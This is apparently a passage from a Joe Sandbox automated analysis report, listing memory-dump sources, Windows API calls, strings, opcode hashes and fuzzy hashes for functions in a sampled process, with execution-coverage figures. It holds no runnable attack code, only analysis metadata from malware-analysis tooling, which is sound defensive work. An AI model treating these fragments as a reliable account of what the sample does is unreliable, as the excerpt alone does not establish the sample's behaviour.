                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Win32 COM Error [$]: {
                                                                                                                                                                                                                                                                          • API String ID: 0-2764242999
                                                                                                                                                                                                                                                                          • Opcode ID: bbafeada3904f471b38281ec781101f1d4918ba72d4876bc9923c4b7d6ee5e78
                                                                                                                                                                                                                                                                          • Instruction ID: ba3489dc1a0dcaf6f326e4778aefdeb0dbe2fb434e50c8577864fa0ba48f267c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbafeada3904f471b38281ec781101f1d4918ba72d4876bc9923c4b7d6ee5e78
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30419270905148DEDB16CBA8C958BDEFBB4EF91314F2181ADD016A7292DF346F08CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0020B399
                                                                                                                                                                                                                                                                            • Part of subcall function 00219940: EnterCriticalSection.KERNEL32(DF534560,DF534560), ref: 00219980
                                                                                                                                                                                                                                                                            • Part of subcall function 00219940: GetCurrentThreadId.KERNEL32 ref: 00219993
                                                                                                                                                                                                                                                                            • Part of subcall function 00219940: LeaveCriticalSection.KERNEL32(?), ref: 00219A11
                                                                                                                                                                                                                                                                            • Part of subcall function 00213A40: SetLastError.KERNEL32(0000000E,?,0020C10B,?,?,?,?), ref: 00213A58
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?, >,00000000), ref: 0020B433
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalCurrentErrorLastSectionThread$EnterLeave
                                                                                                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                                                                                                          • API String ID: 1921999304-4236405459
                                                                                                                                                                                                                                                                          • Opcode ID: 934db1947644249493c55fded5d40479f2453ebeb9684eefca51152e98e5ace3
                                                                                                                                                                                                                                                                          • Instruction ID: e1139c729cdf9e24686a3a8503305b37de57325952bfffdfe15370fcf8bc8f27
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 934db1947644249493c55fded5d40479f2453ebeb9684eefca51152e98e5ace3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D31E170D20308EBDB11EFA0C81ABEEBBB4EF10304F004629F401672D2DBB55A54CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,AA831995,?,?), ref: 6A567128
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,-00000002,?,?), ref: 6A567213
                                                                                                                                                                                                                                                                            • Part of subcall function 6A55D040: std::locale::_Init.LIBCPMT ref: 6A55D138
                                                                                                                                                                                                                                                                            • Part of subcall function 6A55D040: std::locale::_Init.LIBCPMT ref: 6A55D1AC
                                                                                                                                                                                                                                                                            • Part of subcall function 6A55C4E0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6A55C5B5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Failed to get Windows error message [win32 error 0x, xrefs: 6A567146
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Initstd::locale::_$FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                                                                                                                                                                                          • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                                                                                                                          • API String ID: 63520260-3373098694
                                                                                                                                                                                                                                                                          • Opcode ID: d4b30c73501b71cbbc4805ab4ca5f29ef716df92842c1a01fd75a3c2975007ee
                                                                                                                                                                                                                                                                          • Instruction ID: c72938b5eb1b9e7889fb481cb27b4f4b807ffbd7a29a00c45f368337fcf5cbf1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b30c73501b71cbbc4805ab4ca5f29ef716df92842c1a01fd75a3c2975007ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78419E70A003089BDB20CF68CC19BAFBBF9FF45708F11455AE515EB691DBB4AA04CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • OpenEventW.KERNEL32(00000000,00000000,00000001,_pbl_evt,00000008,?,?,003EE9CC,00000001,DF534560,00000000), ref: 0030548E
                                                                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 003054AB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Event$CreateOpen
                                                                                                                                                                                                                                                                          • String ID: _pbl_evt
                                                                                                                                                                                                                                                                          • API String ID: 2335040897-4023232351
                                                                                                                                                                                                                                                                          • Opcode ID: d4482439237158f0f21129b849f926d1aade59165b255e94c3b6ac92a444d728
                                                                                                                                                                                                                                                                          • Instruction ID: 02420760094b67403f8c8cad05dd93a1739895da7f242f72c72e09aeaf2a085b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4482439237158f0f21129b849f926d1aade59165b255e94c3b6ac92a444d728
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF313831D04208EFDB11DFA8C955BEEB7B8EF19714F508219E911BB2C0DB746A09CBA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55B12B
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6A55B18E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                          • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                                          • Opcode ID: 0c164811092b51becf308b456213e9d03959397871d4bad470927e7f48bd8b35
                                                                                                                                                                                                                                                                          • Instruction ID: d599ab66b8bf492b75e9f03889e071e07d2c2e9740e43045ad9da32b754767da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c164811092b51becf308b456213e9d03959397871d4bad470927e7f48bd8b35
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21B470809B84EED721CFA8C90874BBFF4EF15314F14869ED49597B82D7B5AA04CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • #74.MSI(?,ProductVersion,6A5AD308,?), ref: 6A5493C7
                                                                                                                                                                                                                                                                          • #74.MSI(?,ProductVersion,00000000,?), ref: 6A54940C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ProductVersion
                                                                                                                                                                                                                                                                          • API String ID: 0-646591648
                                                                                                                                                                                                                                                                          • Opcode ID: 72ffce5384df3fc9daed524f276a4f08df71238e7f21a59177b7dcd2f4cc3651
                                                                                                                                                                                                                                                                          • Instruction ID: e4df54e981f8e3ed836f7bd45abfc23a4d30c5f451bc6e6d75ef9820fbd44e21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ffce5384df3fc9daed524f276a4f08df71238e7f21a59177b7dcd2f4cc3651
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 790171F2204346AFE704CF54E909BABBBDCEB85251F11492AF506C2280D7B5AC1486A2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHttpLastRequestSend
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 4088757929-3887548279
                                                                                                                                                                                                                                                                          • Opcode ID: e418c898092186bfeb9cbea0432ac0db88f45d58f47a03fd194516332c3ccaa7
                                                                                                                                                                                                                                                                          • Instruction ID: 5b24fb4bf6e77572b01164c0f8778d07ddfe7d1fc0ed38d79d16a756b81ca5bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e418c898092186bfeb9cbea0432ac0db88f45d58f47a03fd194516332c3ccaa7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F0A9B2A053088BC340CF61C90471ABBE4BF9E308F20671EF9449A180EB71C990CBD6
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001C8020: InitializeCriticalSectionAndSpinCount.KERNEL32(00459E24,00000000,DF534560,001B0000,Function_001C1390,000000FF,?,00348B9F,?,?,?,001B6508), ref: 001C8045
                                                                                                                                                                                                                                                                            • Part of subcall function 001C8020: GetLastError.KERNEL32(?,00348B9F,?,?,?,001B6508), ref: 001C804F
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,001B6508), ref: 00348BA3
                                                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001B6508), ref: 00348BB2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00348BAD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                          • API String ID: 450123788-631824599
                                                                                                                                                                                                                                                                          • Opcode ID: d7fcda89022ddb096e44bc44619cf61aae68caff9ede0a4e06abb0ab9a2e2514
                                                                                                                                                                                                                                                                          • Instruction ID: 49bd36fc9c2a1cf423c3a91796ff2d4726d6ed599a7d1eed7a80fb72b45c8660
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7fcda89022ddb096e44bc44619cf61aae68caff9ede0a4e06abb0ab9a2e2514
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAE06DB06003508FE722AF39E404B46BBE4AB18340F00896DE885CAA41EBB0F4048B91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003461FB
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0034687F
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00346890
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                          • String ID: ,b4$a4
                                                                                                                                                                                                                                                                          • API String ID: 1269201914-2941438316
                                                                                                                                                                                                                                                                          • Opcode ID: 2a3e46fa597a28e2fa9ca8b9ad94a7f212ee6ebdbc48424d12158b907865b533
                                                                                                                                                                                                                                                                          • Instruction ID: bd227e39ab619e64b7f17b847f8892ff8e96a60ab9a9c6d2110f0a42a2aebf68
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a3e46fa597a28e2fa9ca8b9ad94a7f212ee6ebdbc48424d12158b907865b533
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8B012E52D9602BD71091B057C03C37034CE4C1B11330883BF400CC04399542C044037
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00346414
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0034687F
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00346890
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                          • String ID: sd4$}d4
                                                                                                                                                                                                                                                                          • API String ID: 1269201914-3564429246
                                                                                                                                                                                                                                                                          • Opcode ID: 0c5db3c1714e7c4030c8167c47bd6a4a2960ea4ec52a0fe398b95cad21395034
                                                                                                                                                                                                                                                                          • Instruction ID: c092c9f1288c21e8aea6884830c9bcbcfc344bc862721a3dcae75b17e331e6bb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c5db3c1714e7c4030c8167c47bd6a4a2960ea4ec52a0fe398b95cad21395034
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B012D526A501FD35466A0A2C03D37038CCCC2B21330C43BB800CC141D4566C050037
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00346414
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0034687F
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00346890
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                          • String ID: Ad4$}d4
                                                                                                                                                                                                                                                                          • API String ID: 1269201914-3951586245
                                                                                                                                                                                                                                                                          • Opcode ID: 2629fcacb0ad6e28a782862ad7292398832407f8270e37385cdb9ac57db411dc
                                                                                                                                                                                                                                                                          • Instruction ID: 940bf711f986dbb8ab580ad590d97a7e1b72f97ee95055294fa2b1b72b3da1d8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2629fcacb0ad6e28a782862ad7292398832407f8270e37385cdb9ac57db411dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7B012D526A501FC75066E0A2C03D37038CD4C2B11330843BB400DC181D5556C094037
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,00000000,?), ref: 001BEE1F
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 001BEE25
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,DF534560,-00000010,?,?), ref: 001BEE55
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,DF534560,-00000010,?,?), ref: 001BEE5B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                          • Opcode ID: a4a19007943ec85cc19fcdec5d4b7f7d82bf6a1d8c0d4c5ffa1ca3480b44ef31
                                                                                                                                                                                                                                                                          • Instruction ID: 1b4fc98472eafad470f6e7ba1ae67dcd645ff741312ae001d6859840e2c10bf9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a19007943ec85cc19fcdec5d4b7f7d82bf6a1d8c0d4c5ffa1ca3480b44ef31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18813770D00259DFDF11DFA8C845BEEBBF8BF15314F244569E811AB281D7B8AA04CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:5.7%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
